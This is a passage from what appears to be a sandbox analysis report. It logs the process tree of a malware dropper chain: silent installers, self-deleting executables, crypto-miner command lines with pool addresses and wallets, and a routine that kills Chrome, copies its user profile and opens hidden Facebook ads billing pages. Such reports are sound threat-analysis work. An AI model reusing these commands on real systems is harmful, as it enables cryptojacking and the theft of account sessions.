        "C:\Users\Admin\AppData\Local\Temp\is-JPVCO.tmp\setups.tmp" /SL5="$60458,454998,229376,C:\Users\Admin\AppData\Local\Temp\QTGTAZLQLS\setups.exe" ll
        19⤵
        
        PID:8308
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
        17⤵
        
        PID:9104
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"
        17⤵
        
        PID:8716
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:7356
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        17⤵
        
        PID:8704
        
        C:\Users\Admin\AppData\Roaming\83FD.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\83FD.tmp.exe"
        18⤵
        
        PID:5884
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w8584 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:5032
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w21213@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:9392
        
        C:\Users\Admin\AppData\Roaming\9A84.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9A84.tmp.exe"
        18⤵
        
        PID:8896
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\9A84.tmp.exe
        19⤵
        
        PID:9460
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        20⤵
        Delays execution with timeout.exe
        
        PID:8488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
        18⤵
        
        PID:8480
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:6348
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
        17⤵
        
        PID:2604
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe /8-2222 & exit
        15⤵
        
        PID:7712
        
        C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe /8-2222
        16⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe" /8-2222
        17⤵
        
        PID:6500
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jx3vte0o.a2m\Four.exe & exit
        15⤵
        
        PID:8612
        
        C:\Users\Admin\AppData\Local\Temp\jx3vte0o.a2m\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\jx3vte0o.a2m\Four.exe
        16⤵
        
        PID:5540
        
        C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:9636
        
        C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe" 1 3.1617574347.606a39cb653ab 104
        18⤵
        
        PID:10124
        
        C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe" 2 3.1617574347.606a39cb653ab
        19⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\0qv0rvydfsv\bcl02qyuuhi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0qv0rvydfsv\bcl02qyuuhi.exe" /ustwo INSTALL
        20⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "bcl02qyuuhi.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0qv0rvydfsv\bcl02qyuuhi.exe" & exit
        21⤵
        
        PID:11240
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "bcl02qyuuhi.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\wmdtamn4ujn\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wmdtamn4ujn\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:11060
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        22⤵
        
        PID:10424
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:10312
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:9060
        
        C:\Users\Admin\AppData\Local\Temp\jai5xj4kraw\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jai5xj4kraw\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:7912
        
        C:\Users\Admin\AppData\Local\Temp\is-HNQMN.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HNQMN.tmp\Setup3310.tmp" /SL5="$30810,138429,56832,C:\Users\Admin\AppData\Local\Temp\jai5xj4kraw\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7668
        
        C:\Users\Admin\AppData\Local\Temp\is-VOG2G.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VOG2G.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:10600
        
        C:\Users\Admin\AppData\Local\Temp\1r5apcj4wjk\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1r5apcj4wjk\app.exe" /8-23
        20⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\nsyqkrdkwki\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsyqkrdkwki\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:7888
        
        C:\Users\Admin\AppData\Local\Temp\is-RG51V.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RG51V.tmp\vict.tmp" /SL5="$4081E,870426,780800,C:\Users\Admin\AppData\Local\Temp\nsyqkrdkwki\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:10044
        
        C:\Users\Admin\AppData\Local\Temp\is-MDQ6C.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-MDQ6C.tmp\win1host.exe" 535
        22⤵
        
        PID:10472
        
        C:\Users\Admin\AppData\Local\Temp\AUY5G3631T\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AUY5G3631T\setups.exe" ll
        17⤵
        
        PID:10156
        
        C:\Users\Admin\AppData\Local\Temp\is-PU72J.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PU72J.tmp\setups.tmp" /SL5="$20786,454998,229376,C:\Users\Admin\AppData\Local\Temp\AUY5G3631T\setups.exe" ll
        18⤵
        
        PID:8456
        
        C:\Users\Admin\AppData\Local\Temp\6e-66630-a2d-c85b5-380ba9b3f346f\Nujelawigi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6e-66630-a2d-c85b5-380ba9b3f346f\Nujelawigi.exe"
        14⤵
        
        PID:5856
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1968
        15⤵
        
        PID:5288
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe" 1 3.1617574036.606a3894811fe 103
        13⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe" 2 3.1617574036.606a3894811fe
        14⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\iveqdq310hf\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iveqdq310hf\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:7256
        
        C:\Users\Admin\AppData\Local\Temp\is-OET1F.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OET1F.tmp\vict.tmp" /SL5="$20578,870426,780800,C:\Users\Admin\AppData\Local\Temp\iveqdq310hf\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\is-BHDAU.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BHDAU.tmp\win1host.exe" 535
        17⤵
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe" /8-23
        15⤵
        
        PID:7352
        
        C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe" /8-23
        16⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\n20uuv0du33\ghg0gvjqyhq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\n20uuv0du33\ghg0gvjqyhq.exe" /ustwo INSTALL
        15⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "ghg0gvjqyhq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\n20uuv0du33\ghg0gvjqyhq.exe" & exit
        16⤵
        
        PID:7996
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "ghg0gvjqyhq.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\jw2nwcq4dxn\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jw2nwcq4dxn\vpn.exe" /silent /subid=482
        15⤵
        
        PID:6356
        
        C:\Users\Admin\AppData\Local\Temp\is-OB05P.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OB05P.tmp\vpn.tmp" /SL5="$303EE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jw2nwcq4dxn\vpn.exe" /silent /subid=482
        16⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\nusrq2pjorg\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nusrq2pjorg\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:7320
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:6592
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        17⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Local\Temp\c5hpkdydpxi\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c5hpkdydpxi\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:8076
        
        C:\Users\Admin\AppData\Local\Temp\is-F2LL4.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F2LL4.tmp\Setup3310.tmp" /SL5="$303BC,138429,56832,C:\Users\Admin\AppData\Local\Temp\c5hpkdydpxi\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\is-N76FB.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-N76FB.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\1XY6E2J57W\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1XY6E2J57W\setups.exe" ll
        12⤵
        
        PID:7120
        
        C:\Users\Admin\AppData\Local\Temp\is-BA3BH.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BA3BH.tmp\setups.tmp" /SL5="$403CE,454998,229376,C:\Users\Admin\AppData\Local\Temp\1XY6E2J57W\setups.exe" ll
        13⤵
        
        PID:1816
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"
        11⤵
        
        PID:5948
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 160
        13⤵
        Program crash
        
        PID:6212
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:2888
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:6536
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:6960
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:6412
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\is-E3MIU.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E3MIU.tmp\lylal220.tmp" /SL5="$A0052,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        12⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\is-2CSGE.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-2CSGE.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:6952
        
        C:\Program Files\Windows Portable Devices\NPDRBYDZXG\irecord.exe
        
        "C:\Program Files\Windows Portable Devices\NPDRBYDZXG\irecord.exe" /VERYSILENT
        14⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\is-V2INC.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-V2INC.tmp\irecord.tmp" /SL5="$303D6,6265333,408064,C:\Program Files\Windows Portable Devices\NPDRBYDZXG\irecord.exe" /VERYSILENT
        15⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\af-afec3-902-145b0-f3db0c33fd8e4\Tukaevumapo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\af-afec3-902-145b0-f3db0c33fd8e4\Tukaevumapo.exe"
        14⤵
        
        PID:5560
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2312
        15⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\d6-bb887-287-bc9b7-815505eed047a\Qoqyxysyra.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d6-bb887-287-bc9b7-815505eed047a\Qoqyxysyra.exe"
        14⤵
        
        PID:4868
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chn25zfc.kbu\md6_6ydj.exe & exit
        15⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\chn25zfc.kbu\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\chn25zfc.kbu\md6_6ydj.exe
        16⤵
        
        PID:7708
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\maykpgbe.iiw\askinstall31.exe & exit
        15⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\maykpgbe.iiw\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\maykpgbe.iiw\askinstall31.exe
        16⤵
        
        PID:7828
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:8152
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:7596
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
        17⤵
        
        PID:5456
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        17⤵
        
        PID:3800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffa3f846e00,0x7ffa3f846e10,0x7ffa3f846e20
        18⤵
        
        PID:8112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,15694699899096866948,16596840158157033203,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1600 /prefetch:8
        18⤵
        
        PID:7536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe & exit
        15⤵
        
        PID:7008
        
        C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
        16⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
        17⤵
        
        PID:8180
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oupbwkew.f0u\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:5608
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a3fca51p.oxp\setup_10.2_mix.exe & exit
        15⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\a3fca51p.oxp\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\a3fca51p.oxp\setup_10.2_mix.exe
        16⤵
        
        PID:996
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o3t4eyqn.bqv\file.exe & exit
        15⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\o3t4eyqn.bqv\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\o3t4eyqn.bqv\file.exe
        16⤵
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        17⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:412
        
        C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe" 1 3.1617574266.606a397abf430 101
        19⤵
        
        PID:8052
        
        C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe" 2 3.1617574266.606a397abf430
        20⤵
        
        PID:6392
        
        C:\Users\Admin\AppData\Local\Temp\nqq3bubfat3\xphkqorzc0v.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nqq3bubfat3\xphkqorzc0v.exe" /ustwo INSTALL
        21⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "xphkqorzc0v.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nqq3bubfat3\xphkqorzc0v.exe" & exit
        22⤵
        
        PID:10196
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "xphkqorzc0v.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:6352
        
        C:\Users\Admin\AppData\Local\Temp\cdzkcvspb1o\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cdzkcvspb1o\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:196
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:9244
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:9504
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        23⤵
        
        PID:9556
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        23⤵
        
        PID:10096
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        23⤵
        
        PID:9600
        
        C:\Users\Admin\AppData\Local\Temp\xqtvy04hqiu\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xqtvy04hqiu\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:7604
        
        C:\Users\Admin\AppData\Local\Temp\is-M85S9.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M85S9.tmp\vict.tmp" /SL5="$A069C,870426,780800,C:\Users\Admin\AppData\Local\Temp\xqtvy04hqiu\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:6580
        
        C:\Users\Admin\AppData\Local\Temp\is-HAQI3.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HAQI3.tmp\win1host.exe" 535
        23⤵
        
        PID:8532
        
        C:\Users\Admin\AppData\Local\Temp\k2ky12mr4gx\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\k2ky12mr4gx\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7504
        
        C:\Users\Admin\AppData\Local\Temp\is-66G1S.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-66G1S.tmp\Setup3310.tmp" /SL5="$304E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\k2ky12mr4gx\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\is-4D51P.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-4D51P.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:9956
        
        C:\Users\Admin\AppData\Local\Temp\je2a15nfl4d\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\je2a15nfl4d\app.exe" /8-23
        21⤵
        
        PID:8836
        
        C:\Users\Admin\AppData\Local\Temp\XHBKLY6O0P\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XHBKLY6O0P\setups.exe" ll
        18⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\is-GCR0K.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GCR0K.tmp\setups.tmp" /SL5="$B04BC,454998,229376,C:\Users\Admin\AppData\Local\Temp\XHBKLY6O0P\setups.exe" ll
        19⤵
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        17⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:8404
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:9004
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
        18⤵
        
        PID:7796
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        18⤵
        
        PID:10784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3f846e00,0x7ffa3f846e10,0x7ffa3f846e20
        19⤵
        
        PID:10816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1752 /prefetch:8
        19⤵
        
        PID:8556
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
